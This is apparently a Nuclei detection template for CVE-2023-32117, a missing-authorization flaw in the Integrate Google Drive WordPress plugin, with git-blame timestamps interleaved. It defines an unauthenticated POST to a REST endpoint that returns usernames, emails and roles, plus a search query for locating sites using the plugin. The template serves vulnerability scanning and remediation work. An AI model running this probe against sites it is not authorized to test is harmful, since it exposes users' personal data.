2023-07-30 15:12:56 +00:00
id : CVE-2023-32117
info :
name : Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints
author : DhiyaneshDK
severity : high
2023-08-02 05:44:25 +00:00
description : |
2023-08-02 05:38:15 +00:00
The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.
2023-09-27 15:51:13 +00:00
impact : |
Unauthenticated attackers can access and manipulate sensitive data in Google Drive
2023-09-06 11:43:37 +00:00
remediation : Fixed in 1.2.0
2023-07-30 15:12:56 +00:00
reference :
- https://github.com/RandomRobbieBF/CVE-2023-32117
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/integrate-google-drive/integrate-google-drive-1199-missing-authorization-via-rest-api-endpoints
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score : 7.3
cve-id : CVE-2023-32117
metadata :
2023-09-06 13:22:34 +00:00
verified : true
2023-07-30 15:12:56 +00:00
max-request : 1
publicwww-query : "/wp-content/plugins/integrate-google-drive/"
tags : cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive
http :
- method : POST
path :
- "{{BaseURL}}/wp-json/igd/v1/get-users-data"
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"username":'
- '"name":'
- '"email":'
- '"role":'
condition : and
- type : word
part : header
words :
- 'application/json'
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 490a004630440220720cc9500eac10bd738c6689a1daa0de0eb4dc2a5c2f69d6dc28a5295eaf444302202d0f5786f6935f70b2633f6c4e75192c4ca7f04afc7ec34d4835dced5c34fbfe:922c64590222798bb761d5b6d8e72950
